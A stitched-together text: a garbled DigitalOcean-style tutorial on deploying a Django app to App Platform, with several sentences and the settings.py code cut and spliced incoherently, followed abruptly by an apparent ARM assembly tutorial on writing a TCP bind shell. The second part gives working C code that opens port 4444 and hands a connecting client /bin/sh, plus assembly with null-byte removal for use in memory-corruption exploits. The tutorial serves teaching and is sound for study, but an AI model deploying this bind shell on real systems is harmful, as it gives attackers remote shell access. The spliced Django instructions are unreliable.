~.venvs/django/bin/activate Your prompt should change to indicate that you are now operating within a Python virtual environment. It will look something like this: (django)user@host:~$. With your virtual environment active, install Django, Gunicorn, dj-database-url, and the psycopg2 PostgreSQL adaptor with the local instance of pip: - pip install django gunicorn psycopg2-binary dj-database-url Note: When the virtual environment is activated (when your prompt has (django) preceding it), use pip instead of pip3, even if you are using Python 3. The virtual environment’s copy of the tool is always named pip, regardless of the Python version. These packages do the following: django- Installs the Django framework and libraries gunicorn- A tool for deploying Django with a WSGI dj-database-url- A Django tool for parsing a database URL psycopg2- A PostgreSQL adapter that allows Django to connect to a PostgreSQL database Now that you have these packages installed, you will need to save these requirements and their dependencies so App Platform can install them later. You can do this using pip and saving the information to a requirements.txt file: - pip freeze > requirements.txt You should now have all of the software needed to start a Django project. You are almost ready to deploy. Step 2 — Creating the Django Project Create your project using the django-admin tool that was installed when you installed Django: - django-admin startproject django_app At this point, your current directory ( django_app in your case) will have the following content: manage.py: A Django project management script. django_app/: The Django project package. This should contain the __init__.py, settings.py, urls.py, asgi.py, and wsgi.pyfiles. This directory will be the root directory of your project and will be what we upload to GitHub. Navigate into this directory with the command: - cd django_app Let’s adjust some settings before deployment. Adjusting the Project Settings Now that you’ve created a Django project, you’ll need to modify the settings to ensure it will run properly in App Platform. Open the settings file in your text editor: - nano django_app/settings.py Let’s examine our configuration one step at a time. Reading Environment Variables First, you need to add the os import statement to be able to read environment variables: import os Setting the Secret Key Next, you need to modify the SECRET_KEY directive. This is set by Django on the initial project creation and will have a randomly generated default value. It is unsafe to keep this hardcoded value in the code once it’s pushed to GitHub, so you should either read this from an environment variable or generate it when the application is started. To do this, add the following import statement at the top of the settings file: from django.core.management.utils import get_random_secret_key Now modify the SECRET_KEY directive to read in the value from the environment variable DJANGO_SECRET_KEY or generate the key if it does not find said environment variable: SECRET_KEY = os.getenv("DJANGO_SECRET_KEY", get_random_secret_key()) Warning: If you don’t set this environment variable, then every time the app is re-deployed, this key will change. This can have adverse effects on cookies and will require users to log in again every time this key changes. You can generate a key using an online password generator. Setting Allowed Hosts Now locate the ALLOWED_HOSTS directive. This defines a list of the server’s addresses or domain names that may be used to connect to the Django instance. Any. App Platform supplies you with a custom URL as a default and then allows you to set a custom domain after you have deployed the application. Since you won’t know this custom URL until you have deployed the application, you should attempt to read the ALLOWED_HOSTS from an environment variable, so App Platform can inject this into your app when it launches. We’ll cover this process more in-depth in a later section. But for now, modify your ALLOWED_HOSTS directive to attempt to read the hosts from an environment variable. The environment variable can be set to either a single host or a comma-delimited list: ALLOWED_HOSTS = os.getenv("DJANGO_ALLOWED_HOSTS", "127.0.0.1,localhost").split(",") Setting the Debug Directive Next you should modify the DEBUG directive so that you can toggle this by setting an environment variable: DEBUG = os.getenv("DEBUG", "False") == "True" Here you used the getenv method to check for an environment variable named DEBUG. If this variable isn’t found, we should default to False for safety. Since environment variables will be read in as strings from App Platform, be sure to make a comparison to ensure that your variable is evaluated correctly. Setting the Development Mode Now create a new directive named DEVELOPMENT_MODE that will also be set as an environment variable. This is a helper variable that you will use to determine when to connect to your Postgres database and when to connect to a local SQLite database for testing. You’ll use this variable later when setting up the database connection: DEVELOPMENT_MODE = os.getenv("DEVELOPMENT_MODE", "False") == "True" Configuring Database Access Next, find the section that configures database access. It will start with DATABASES. The configuration in the file is for a SQLite database. App Platform allows you to create a PostgreSQL database for our project, so you need to adjust the settings to be able to connect to it. Warning: If you don’t change these settings and continue with the SQLite DB, your database will be erased after every new deployment. App Platform doesn’t maintain the disk when re-deploying applications, and your data will be lost. Change the settings with your PostgreSQL database information. You’ll read in the database connection information and credentials from an environment variable, DATABASE_URL, that will be provided by App Platform. Use the psycopg2 adaptor we installed with pip to have Django access a PostgreSQL database. You’ll use the dj-database-url package that was installed to get all of the necessary information from the database connection URL. To facilitate with development of your application locally, you’ll also use an if statement here to determine if DEVELOPMENT_MODE is set to True and which database should be accessed. By default, this will be set to False, and it will attempt to connect to a PostgreSQL database. You also don’t want Django attempting to make a database connection to the PostgreSQL database when attempting to collect the static files, so you’ll write an if statement to examine the command that was executed and not connect to a database if you determine that the command given was collectstatic. App Platform will automatically collect static files when the app is deployed. First, install the sys library so you can determine the command that was passed to manage.py and the dj_database_url library to be able to parse the URL passed in: . . . import os import sys import dj_database_url Next remove the current DATABASE directive block and replace it with this:")), } Next, move down to the bottom of the file and add a setting indicating where the static files should be placed. When your Django app is deployed to App Platform, python manage.py collectstatic will be run automatically. Set the route to match the STATIC_URL directive in the settings file: . . . STATIC_URL = "/static/" STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles") Note: If you plan on storing static files in other locations outside of your individual Django-app static files, you will need to add an additional directive to your settings file. This directive will specify where to find these files. Be aware that these directories cannot share the same name as your STATIC_ROOT. If you do not have extra static files do not include this setting.: . . . STATIC_URL = "/static/" STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles") STATICFILES_DIRS = (os.path.join(BASE_DIR, "static"),) Reviewing the Completed settings.py File Your completed file will look like this: from django.core.management.utils import get_random_secret_key from pathlib import Path import os import sys import dj_database_url # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent # Quick-start development settings - unsuitable for production # See # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.getenv("DJANGO_SECRET_KEY", get_random_secret_key()) # SECURITY WARNING: don't run with debug turned on in production! DEBUG = os.getenv("DEBUG", "False") == "True" ALLOWED_HOSTS = os.getenv("DJANGO_ALLOWED_HOSTS", "127.0.0.1,localhost").split(",") # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] = 'django_app = 'django_app.wsgi.application' # Database # DEVELOPMENT_MODE = os.getenv("DEVELOPMENT_MODE", "False") == "True"files") # Uncomment if you have extra static files and a directory in your GitHub repo. # If you don't have this directory and have this uncommented your build will fail # STATICFILES_DIRS = (os.path.join(BASE_DIR, "static"),) Note: There are values within settings.py that are specific to your project (such as WSGI_APPLICATION and ROOT_URLCONF) that are generated when you first setup your app. If you named your app something other than django_app and are going to copy and paste this code directly be sure to modify these settings to match your project. They will have been set correctly in the settings.py that was generated for you. Save and close settings.py. You’ve now finished configuring your Django app to run on App Platform. Next, you’ll push the app to GitHub and deploy it to App Platform. Step 3 — Pushing the Site to GitHub DigitalOcean App Platform deploys your code from GitHub repositories, so the first thing you’ll need to do is get your site in a git repository and then push that repository to GitHub. First, initialize your Django project as a git repository: - git init When you work on your Django app locally, certain files get added that are unnecessary for deployment. Let’s exclude that directory by adding it to Git’s ignore list. Create a new file called .gitignore: - nano .gitignore Now add the following code to the file: db.sqlite3 *.pyc Save and close the file. Now execute the following command to add files to your repository: - git add django_app/ manage.py requirements.txt static/ Make your initial commit: - git commit -m "Initial Django App" Your files will commit: Output[master (root-commit) eda5d36] Initial Django App 8 files changed, 238 insertions(+) create mode 100644 django_app/__init__.py create mode 100644 django_app/asgi.py create mode 100644 django_app/settings.py create mode 100644 django_app/urls.py create mode 100644 django_app/wsgi.py create mode 100644 manage.py create mode 100644 requirements.txt create mode 100644 static/README.md Open your browser and navigate to GitHub, log in with your profile, and create a new repository called django-app.: - git branch -M main Finally, push your main branch to GitHub’s main branch: - git push -u origin main Your files will transfer: OutputEnumerating objects: 12, done. Counting objects: 100% (12/12), done. Delta compression using up to 8 threads Compressing objects: 100% (9/9), done. Writing objects: 100% (12/12), 3.98 KiB | 150.00 KiB/s, done. Total 12 (delta 1), reused 0 (delta 0) remote: Resolving deltas: 100% (1/1), done. To github.com:yourUsername/django-app.git * [new branch] main -> main Branch 'main' set up to track remote branch 'main' from 'origin'. Enter your GitHub credentials when prompted to push your code. Your code is now on GitHub and accessible through a web browser. Now you. Click Install and Authorize. You’ll be returned to your DigitalOcean dashboard to continue creating your app. Once your GitHub account is connected, select the your_account/django django_app.wsgi. Your completed run command should be gunicorn --worker-tmp-dir /dev/shm django_app.wsgi. Next, you need to define the environment variables you declared in your project’s settings. App Platform has a concept of App-Wide Variables, which are environment variables that are provided by App Platform, such as APP_URL and APP_DOMAIN. The platform also maintains Component-Specific Variables, which are variables that are exported from your components. These will be useful for determining your APP_DOMAIN beforehand so you can properly set DJANGO_ALLOWED_HOSTS. You will also use these variables to copy configuration settings from your database. To read more about these different variables, consult the App Platform Environment Variable Documetation For your Django app to function, you need to set the following environment variables like so: DJANGO_ALLOWED_HOSTS-> ${APP_DOMAIN} - This allows us to know the randomly generated URL that App Platform provides and provide it to our app DATABASE_URL-> ${<NAME_OF_YOUR_DATABASE>.DATABASE_URL} - In this case, we’ll name our database db in the next step, so this should be ${db.DATABASE_URL} DEBUG-> True - Set this to Truefor now to verify your app is functioning and set to Falsewhen it’s time for this app to be in production DJANGO_SECRET_KEY-> <A RANDOM SECRET KEY> - You can either allow your app to generate this at every launch or pick a strong password with at least 32 characters to use as this key. Using a secure password generator is a good option for this - Don’t forget to click the Encrypt check box to ensure that your credentials are encrypted for safety To set up your database, click the Add a Database button. You will be presented with the option of selecting a small development database or integrating with a managed database elsewhere. For this deployment, select the development database and ensure that the name of the database is db. Once you’ve verified this, click the Add Database button. Click Next, and you’ll be directed to the Finalize and Launch screen where you’ll choose your plan. Be sure to select the appropriate plan to fit your needs, whether in Basic App or Professional App and then click Launch App at the bottom. Your app will build and deploy: Once the build process completes, the interface will show you a healthy site. Now you need to access your app’s console through the Console tab and perform the Django first launch tasks by running the following commands: python manage.py migrate- This will perform your initial database migrations. python manage.py createsuperuser- This will prompt you for some information to create an administrative user Once you are done with that, click on the link to your app provided by App Platform: This link should take you to the standard initial Django page. And now you have a Django app deployed to App Platform. Any changes that you make and push to GitHub will be automatically deployed. Step 5 — Deploying Your Static Files Now that you’ve deployed your app, you may notice that your static files aren’t being loaded if you have DEBUG set to False. Django doesn’t serve static files in production and instead wants you to deploy them using a web server or CDN. Luckily, App Platform can do just that. App Platform provides free static asset serving if you are running a service alongside it, as you are doing with your app. So you’re going to deploy your same Django app but as a static site this time. Once your app is deployed, add a static site component from the Components tab in your app. Select the same GitHub repository as your deployed Django service. Click Next to continue. Next, provide your app’s name and ensure the main branch is selected. Click Next to continue. Your component will be detected as a Service, so you’ll want to change the type to Static Site. Essentially we’ll have Django gather our static files and serve them. Set the route to what you set your STATIC_URL directive in your settings file. We set our directive to /static/ so set the route to /static. Finally, your static files will be collected into Output Directory in your app to match your STATIC_ROOT setting in settings.py. Yours is set to staticfiles, so set Output Directory to that. Click Next, and you’ll be directed to the Finalize and Launch screen. When static files are paired with a service, it is free, so you won’t see any change in your bill. Click Launch App and deploy your static files. Now, if you have Debug set to False, you’ll see your static files properly displayed. Conclusion In this tutorial, you set up a Django project and deployed it using DigitalOcean’s App Platform. Any changes you commit and push to your repository will be re-deployed, so you can now expand your application. You can find the example code for this tutorial in the DigitalOcean Sample Images Repository The example in this tutorial is a minimal Django project. Your app might have more applications and features, but the deployment process will be the same.
https://www.digitalocean.com/community/tutorials/how-to-deploy-django-to-app-platform/?refcode=d1f83a0a642d&utm_campaign=Referral_Invite&utm_medium=Referral_Program
CC-MAIN-2022-05
refinedweb
3,026
55.34
73041/how-to-get-the-sql-from-a-django-queryset Hello @kartik, Try this in your queryset: print my_queryset.query For example: from django.contrib.auth.models import User print User.objects.filter(last_name__icontains = 'ax').query It should also be mentioned that if you have DEBUG = True, then all of your queries are logged, and you can get them by accessing connection.queries: from django.db import connections connections['default'].queries Hope it helps! Thank You!! FWIW, the multiprocessing module has a nice interface for ...READ MORE Hello @kartik, In your Person model add: def __unicode__(self): ...READ MORE Hello @kartik, You can fetch the URL in ...READ MORE Hello @kartik, To drop the database and run syncdb again. ...READ MORE You can also use the random library's ...READ MORE Syntax : list. count(value) Code: colors = ['red', 'green', ...READ MORE can you give an example using a ...READ MORE You can simply the built-in function in ...READ MORE Hello @kartik, Set show_change_link to True (False by default) in your inline ...READ MORE Hello @kartik, The << part is wrong, use < instead: $ ./manage.py shell ...READ MORE OR At least 1 upper-case and 1 lower-case letter Minimum 8 characters and Maximum 50 characters Already have an account? Sign in.
https://www.edureka.co/community/73041/how-to-get-the-sql-from-a-django-queryset?show=73042
CC-MAIN-2021-31
refinedweb
211
61.73
Volatile therefore there is no need make the local variables as volatile. You should prefer to use volatile variables rather than locks for one of two principal reasons: simplicity or scalability. Use of volatile variables instead of locks makes corejava corejava if we declare abstract as final what happen CoreJava CoreJava Sir, What is the difference between pass by value and pass by reference. can u give an example Corejava Interview,Corejava questions,Corejava Interview Questions,Corejava : An immutable class is a class to which values assigned to the variables can not be altered because they are declared as final, all the variables must...; Q 3 : What is dynamic method dispatch ? Ans Corejava Interview,Corejava questions,Corejava Interview Questions,Corejava ; Variables The variables... class may contain final as well as static variables but the user needs...; Q 2. What is hashcode? When is hashCode() used ? Ans :  Corejava Interview,Corejava questions,Corejava Interview Questions,Corejava is a path name under that directory. Q 4. What's the difference... makes a class available to the class that imports it so that its public variables corejava - Java Interview Questions singleton java implementation What is Singleton? And how can it get implemented in Java program? Singleton is used to create only one...- - - - - - - -public class Singleton{ private static volatile Singleton instance; private corejava - Java Beginners properties (ie. data variables) and methods (ie. functions).public class Box{// what are the properties or fieldsprivate int length;private int width;private int height;// what are the actions or methodspublic void setLength(int p){length Variables Variables What are the difference between Static variables, instance variables and local variables corejava - Java Beginners corejava hai this is jagadhish. I have a doubt on corejava.How many design patterns are there in core java? which are useful in threads?what r...); th.sleep(1000); } } catch(InterruptedException e Corejava Interview,Corejava questions,Corejava Interview Questions,Corejava class is a class to which values assigned to the variables can not be altered because they are declared as final, all the variables must be assigned Variables in Java Variables Data... variables) Java Primitive Data Types Data Type Description... 0.0d In this section, you will learn about Java variables. A variable What is E-Learning? What is E-Learning? What is E-Learning What is JavaScript Variables ? What is JavaScript Variables ? Hi, My question is that What is Variable in JavaScript Programming Language. How to declare variables in JavaScript Program. Thanks What are local variables? What are local variables? hi, What are local variables? thanks... a block of syntax like methods. Local variables should be initialised before accessing them. For details related to Local Variables Variables Variables Data... variables) Java Primitive Data Types Data Type Description... 0.0d In this section, you will learn about Java variables. A variable What are instance variables? What are instance variables? Hi, What are instance variables... for these non-static variables so we can say that these are related to objects (instances of the class).Hence these variables are also known as instance variables corejava - Java Beginners corejava pass by value semantics Example of pass by value semantics in Core Java. Hi friend,Java passes parameters to methods using pass... of the reference's value is what is passed to the method -- it's passed by value Java Variables Help Please! Java Variables Help Please! Hi, I just started with java and i need...("+------------------+"); try { Thread.sleep(2500); } catch(InterruptedException e...!"); try { Thread.sleep(1000); } catch(InterruptedException e Variables in Java Variable in Java In this section you will learn about variables in java. First we should know, what is variable? variable is a location in the memory where.... There are some rules you have to follow while declaring a variables, they are as follows In Struts What is Model? In Struts What is Model? This tutorial explains you What is Model in Struts. Struts is MVC based application and it is separated into three integral parts... you can create the variables in Action to hold the data of the application corejava - Java Beginners What is Dynamic Binding What is Dynamic Binding in Core Java? Hi,Dynamic Binding:It is the way that provide the maximum functionality to a program for a specific type at runtime. There are two type of binding first corejava - Java Beginners Deadlock Core Java What is Deadlock in Core Java? Deadlock is nothing but accessing a same space by different by different programs at the same time . To avoid this problem java has a concept called synchronization corejava PHP Variables between Scripts PHP Variables Between Scripts As you know how to define variables and how to use them in your form. Now, we learn how to use PHP variables... the example and you will understand easily. Here, we create an E-mail form using The volatile keyword The volatile keyword The volatile is a keyword defined in the java programming language. Keywords.... The volatile keyword is mostly used to indicate that a member variable transient variables in java transient variables in java hello, What are transient variables in java? hii, Transient variables are variable that cannot be serialized JavaScript Variables JavaScript Variables: Variables are like containers, which contains a value. In JavaScript variables dependent on the value, not on the datatype that means variables are of dynamic typing. Variable names are case-sensitive Static & Instance variables in java Static & Instance variables in java What are the Difference between Static & Instance variables in java volatile Java Keyword volatile Java Keyword The volatile is a keyword defined in the java programming language... to a compiler in java programming language likewise the volatile keyword indicates What are the Advantages of E-Commerce? What are the Advantages of E-Commerce? E-commerce has looked upon as one of the most efficient mediums of boosting revenue and profit. The different e.... There are some e-commerce tools which are totally secure and highly efficient while some Java Variables - Java Beginners Java Variables Hi, I had a small doubt. What are Object Reference variables in java..What actually they do.. And What actually an Object... reference variables, and how can i see what a reference variable contains.. shape java protected variables java protected variables Can we inherit the Java Protected variable..? of course you can. But I think what you mean is "override"? Is tha so? There are some restriction What is E-Ink Display close to films, came as a real surprise. How E-Ink display works and what..., that is where the famous technology and proprietary brand name of E-INK technology or E-Ink display come. No wonder that more than so called e-book which is readable CoreJava Project CoreJava Project Hi Sir, I need a simple project(using core Java, Swings, JDBC) on core Java... If you have please send to my account how to initialise variables in jsp? how to initialise variables in jsp? 1. what is the problem in the folloing jsp <%@ page import="net.viralpatel.struts.helloworld.form.LoginForm" %> <%@ page language="java" contentType="text/html interface variables - Java Beginners interface variables why interface variable is by default final? what was the necessisity to make it final? plz explain me with good java prog am a 4th year student... anyone to tell me what should i do and what language is best to use in my 4th year project. i want to program an e-mail system for our department.. to conclude variables are **called instance variables because they are created** whenever an object of the class is instantiated. . In this notes, what I could not understand is this These variables are called instance...variables are **called instance variables because they are created** whenever... fields inside the body of the class definition. These variables are called What is E-Commerce Web Design What is E-Commerce Web Design Electronic Commerce (E-Commerce) is the paperless exchange of business... technologies. In recent times E Commerce emerged as one of the most Know the Different Types of E-Commerce Know the Different Types of E-Commerce There are different types of e-commerce and we need to know what e-commerce is and how different it is from e-business. E-commerce is used for business transactions through the internet can a volatile memory loss data on power cut can a volatile memory loss data on power cut Can a volatile memory loss ache and main memory content on power cut? In Volatile, Cache and main memory will lose their contents when the power is off E-Commerce Web Hosting E-Commerce Web Hosting What is e-commerce hosting? E-Commerce Hosting refers to the web hosting for E-Commerce Web Applications. In case of e... and advertising packages. In short the e-commerce web hosting services is the web hosting Open Source e-commerce Open Source e-commerce Open Source Online Shop E-Commerce Solutions Open source Commerce is an Open Source based online shop e-commerce solution that is available for free under E-Commerce Solutions Services,E-Commerce Web Sevices,E-Commerce Internet Services and Solutions of the general customers what they want to look for in any shopping cart and in E... to drive traffic and convert browsers into buyers. What we serve: Specific E...E-Commerce Solutions Services RoseIndia.net is specialized in customer Scripting Variables in JSP Custom Tag variable in Custom Tag What are Scripting Variables ? Scripting variables are variables that are available to the JSP page when any JSP page is called. Scripting... Scripting Variables in JSP Custom Tag   Open Source E-mail Open Source E-mail Open Source E-Mail... that I've lived with the Mozilla Foundation's Thunderbird e-mail client for a few... and enjoy it, but there's a fundamental difference in how we approach e-mail clients java java What are Transient and Volatile Modifiers? Transient... as part of it's objects persistent state.Transient variables are not serialized. Volatile: Volatile modifier applies to variables only, and it tells PHP Working with Variables Tutorial PHP variables If you are planning to start writing in PHP you should know what...;cricket"; What is a variable exactly? A variable is much like a container jsp scope variables - JSP-Interview Questions jsp scope variables what is the importance of page,session,request n application scope variables in JSP?Am not understanding where which scope... in advance. Hi Friend, Scope variables are basically used for sharing Jsp Scope Variables - Java Interview Questions Jsp Scope Variables what is the importance of page,session,request n application scope variables in JSP?Am not understanding where which scope... in advance. Hi Friend, JSP Scope Variables: Page scope-It makes What to Find in E-Commerce Shopping Cart Software ? What to Find in E-Commerce Shopping Cart Software The e-commerce shopping... the back button or type a new URL and move on to other websites. Your e... more user-friendly, you have to select the right e-commerce shopping cart How to Find a Server for E-commerce? How to Find a Server for E-commerce? What is e-commerce? Life has really... even to the kids. This process of trade via the internet is called e-commerce. To facilitate e-commerce, having a website for your business is an essential Java ClassPath ; Question: What is the meaning of PATH and CLASSPATH ? How it is set... for.We set the PATH variables like this i.e path C:\Java\jdk1.6.0_03...; Environment variables (v) system varables click on new (vi How to get started with your E-commerce business How to get started with your E-commerce business The sky touching popularity of e-commerce business around the globe has lured thousands of businessmen.... However, a lot of them are quite apprehensive about the whole affair of e-commerce E-commerce: Benefiting Customers Around the Globe E-commerce: Benefiting Customers Around the Globe E-commerce is a means... can say that E-commerce has been a revolutionary change in the sector of trade..., the customers are in no less a heaven with the introduction of e-commerce. Gone e commerce e commerce e-commerce in java explain briefly corejava - Java Beginners Corejava - Java Interview Questions corejava - Java Interview Questions CoreJava - Java Beginners What is Locale - Java Beginners What is Locale Hi, What is Locale? Write example to show the use of Locale. Thanks Hi Friend, A locale is the part...:// What is JavaScript? What is JavaScript? Hi, Sometime the students trying to know make there career in Java. For java programming beginners always try to know What is Java script and other java related queries. How to define what is JavaScript getting variables getting variables how to get variables from servlet program to webservice program Environment variables Environment variables How to set Environment Variables in JAVA 6 n Tomcat 6 CLASSPATH, JAVA_HOME, PATH, & CATALINA variables plzzz plzz help me What is the output if.... What is the output if.... Here is my code. what is the output if a. the value of lowerLimit is 50? b. if the value of lowerLimit is 150? int...."); System.out.println(Exiting the try block."); } catch (Exception e What is Joomla What is Joomla? Joomla is one of the most reliable, manageable, handy... and streaming video gallery, E-Commerce facility and Shopping cart (webstore... extensions, Blogs Management, User Registration, user management and E-Mail Java Tutorial will learn about what is Java, Download Java, Java environment set up... identifiers, access specifiers, Variables in Java, Java literals, Java operators, conditional statements, loops in Java. what is Java ? Java is a programming Introduction to Generics in Java Introduction to Generics in Java: What are the benefits of using Generics... the Generics you can reduce the bugs in your program. What is Generics... Set<E> This is the Generic Type and here E is called How B2E E-Commerce works with Employees in Mind How B2E E-Commerce works with Employees in Mind B2E – Business... also becomes cheaper. There are mainly three components of e-business &ndash... for working group. The B2E e-commerce is a great way of allowing online employees Online Assistants on E-Commerce can be Helpful Online Assistants on E-Commerce can be Helpful The task is tedious when... assistants on E-commerce which may prove very helpful and productive. The online... assistants boost your e-commerce solutions. This will ease your work and help you Open Source E-mail Open Source E-mail Server MailWasher Server Open Source... code for complete control. POPFile: Open Source E-Mail... this. The origins of POPFile are not really all that mysterious. It is an open source e What's wrong with my pagination code in JSP? What's wrong with my pagination code in JSP? Dear experts, I've... = 0, totalrecords = 0, recordsPerPage = 5; // variables used...(); } catch (Exception e) { System.out.println Java - Declaring variables in for loops Java - Declaring variables in for loops Java - Declaring variables in for loops instance variables - Java Beginners instance variables instance variables E-Commerce E-Commerce The Electronic commerce or simply E-commerce for short is a term used for buying and selling of products on Internet. E-Commerce is allows... companies are selling products through online website site, know as E-Commerce store Variables In Java This tutorial demonstrates you about the variables and their types in java What is meant by embedded SQL? What is meant by embedded SQL? What is meant by embedded SQL? Hi, Embedded SQL statements are embedded with in application program... of host variables specified within the statement might change). Thanks ORACLE- ATG -E Commerce ORACLE- ATG -E Commerce HI can we get ATG e-commerce Tutorials Topics E-R diagram E-R diagram Hi,Hw to do draw E-R diagram for online movie ticket booking Java Substituting Variables Java Substituting Variables Java Substituting Variables An E-mail protocol for storage An E-mail protocol for storage An E-mail protocol for storage, management and change, espically in corporate offices- a) Message handlindling services, b) Postal Service's, C) Data Storage, D)All of the above, e) None E BOOK REQUIRED E BOOK REQUIRED Wicket in Action pdf required Urgently. Thnx E-Mail header extractor i want to extract email header with using of java so please show the code of email extractor as result all the field show different color and or it extract ip where the email came Variables in Smarty Variables in Smarty Templates Engine for PHP Smarty Template variables...; Object properties and methods, Config file variables Smarty Variables can be declared as: {$new}, {$1212},{$_} Except PHP Null Variables PHP Null Variables PHP Null variable is a type that only stores the null value. The Null value indicates that the used variable has no value. The variable... error_reporting(E_ALL); $text = NULL; if($text == null JSP - Update displayed content & session variables when user clicks on a button - JSP-Servlet JSP - Update displayed content & session variables when user clicks... what the best way/quickest way is to do this. I've been hoping that some... is something like what I am trying to do using excerpts from my code
http://www.roseindia.net/tutorialhelp/comment/420
CC-MAIN-2015-14
refinedweb
2,863
57.16
: Before we start, I’d like to remind you that bind shell and how does it really work? With a bind shell, you open up a communication port or a listener on the target machine. The listener then waits for an incoming connection, you connect to it, the listener accepts the connection and gives you shell access to the target system. This is different from how Reverse Shells work. With a reverse shell, you make the target machine communicate back to your machine. In that case, your machine has a listener port on which it receives the connection back from the target system. Both types of shell have their advantages and disadvantages depending on the target environment. It is, for example, more common that the firewall of the target network fails to block outgoing connections than incoming. This means that your bind shell would bind a port on the target system, but since incoming connections are blocked, you wouldn’t be able to connect to it. Therefore, in some scenarios, it is better to have a reverse shell that can take advantage of firewall misconfigurations that allow outgoing connections. If you know how to write a bind shell, you know how to write a reverse shell. There are only a couple of changes necessary to transform your assembly code into a reverse shell once you understand how it is done. To translate the functionalities of a bind shell into assembly, we first need to get familiar with the process of a bind shell: - Create a new TCP socket - Bind socket to a local port - Listen for incoming connections - Accept incoming connection - Redirect STDIN, STDOUT and STDERR to a newly created socket from a client - Spawn the shell This is the C code we will use for our translation. #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int host_sockid; // socket file descriptor int client_sockid; // client file descriptor struct sockaddr_in hostaddr; // server aka listen address int main() { // Create new TCP socket host_sockid = socket(PF_INET, SOCK_STREAM, 0); // Initialize sockaddr struct to bind socket using it hostaddr.sin_family = AF_INET; // server socket type address family = internet protocol address hostaddr.sin_port = htons(4444); // server port, converted to network byte order hostaddr.sin_addr.s_addr = htonl(INADDR_ANY); // listen to any address, converted to network byte order // Bind socket to IP/Port in sockaddr struct bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); // Listen for incoming connections listen(host_sockid, 2); // Accept incoming connection client_sockid = accept(host_sockid, NULL, NULL); // Duplicate file descriptors for STDIN, STDOUT and STDERR dup2(client_sockid, 0); dup2(client_sockid, 1); dup2(client_sockid, 2); // Execute /bin/sh execve("/bin/sh", NULL, NULL); close(host_sockid); return 0; } The first step is to identify the necessary system functions, their parameters, and their system call numbers. Looking at the C code above, we can see that we need the following functions: socket, bind, listen, accept, If you’re wondering about the value of _NR_SYSCALL_BASE, it’s 0: root@raspberrypi:/home/pi# grep -R "__NR_SYSCALL_BASE" /usr/include/arm-linux-gnueabihf/asm/ /usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_SYSCALL_BASE 0 These are all the syscall numbers we’ll need: #define __NR_socket (__NR_SYSCALL_BASE+281) #define __NR_bind (__NR_SYSCALL_BASE+282) #define __NR_listen (__NR_SYSCALL_BASE+284) #define __NR_accept (__NR_SYSCALL_BASE+285) bind:~/bindshell $ gcc bind_test.c -o bind_test pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test Terminal 2: pi@raspberrypi:~ $ netstat -tlpn Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1058/bind_test pi@raspberrypi:~ $ netcat -nv 0.0.0.0 4444 Connection to 0.0.0.0 4444 port [tcp/*] succeeded! This is our strace output: pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test execve("./bind_test", ["./bind_test"], [/* 49 vars */]) = 0 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0 listen(3, 2) = 0 accept(3, 0, NULL) = 4 dup2(4, 0) = 0 dup2(4, 1) = 1 dup2: host_sockid = socket(2, 1, 0) – the result (host_sockid) of the socket call will land in r0. This result is reused in other functions like listen(host_sockid, 2), host_sockid and will end up in r0. Since we need host_sockid later on, let’s save it to r4. In ARM, you can’t simply move any immediate value into a register. If you’re interested more details about this nuance, there is a section in the Memory Instructions chapter (at the very end). To check if I can use a certain immediate value, I wrote a tiny script (ugly code, don’t look) called rotator.py. pi@raspberrypi:~/bindshell $ python rotator.py Enter the value you want to check: 281 Sorry, 281 cannot be used as an immediate number and has to be split. pi@raspberrypi:~/bindshell $ python rotator.py Enter the value you want to check: 200 The number 200 can be used as a valid immediate number. 50 ror 30 --> 200 pi@raspberrypi:~/bindshell $ python rotator.py Enter the value you want to check: 81 The number 81 can be used as a valid immediate number. 81 ror 0 --> 81 Final code snippet: .THUMB mov r0, #2 mov r1, #1 sub r2, r2, r2 mov r7, #200 add r7, #81 // r7 = 281 (socket syscall number) svc #1 // r0 = host_sockid value mov r4, r0 // save host_sockid in r4 2 – Bind Socket to Local Port With the first instruction, we store a structure object containing the address family, host port and host address in the literal pool and reference this object with pc-relative addressing.: // bind(r0, &sockaddr, 16) adr r1, struct_addr // pointer to address, port [...] struct_addr: .ascii "\x02\xff" // AF_INET 0xff will be NULLed .ascii "\x11\x5c" // port number 4444 .byte 1,1,1,1 // IP Address The next 5 instructions are STRB (store byte) instructions. A STRB instruction stores one byte from a register to a calculated memory region. The syntax [r1, #1] means that we take R1 as the base address and the immediate value (#1) as an offset. In the first instruction we made R1 point to the memory region where we store the values of the address family AF_INET, the local port we want to use, and the IP address. We could either use a static IP address, or we could specify 0.0.0.0 to make our bind shell listen on all IPs which the target is configured with, making our shellcode more portable. Now, those are a lot of null-bytes. Again, the reason we want to get rid of any null-bytes is to make our shellcode usable for exploits that take advantage of memory corruption vulnerabilities that might be sensitive to null-bytes. Some buffer overflows are caused by improper use of functions like ‘strcpy’. The job of strcpy is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work. With the strb instruction we take a null byte from a register and modify our own code during execution. This way, we don’t actually have a null byte in our shellcode, but dynamically place it there. This requires the code section to be writable and can be achieved by adding the -N flag during the linking process. For this reason, we code without null-bytes and dynamically put a null-byte in places where it’s necessary. As you can see in the next picture, the IP address we specify is 1.1.1.1 which will be replaced by 0.0.0.0 during execution. The first STRB instruction replaces the placeholder xff in \x02\xff with x00 to set the AF_INET to \x02\x00. How do we know that it’s a null byte being stored? Because r2 contains 0’s only due to the “sub r2, r2, r2” instruction which cleared the register. The next 4 instructions replace 1.1.1.1 with 0.0.0.0. Instead of the 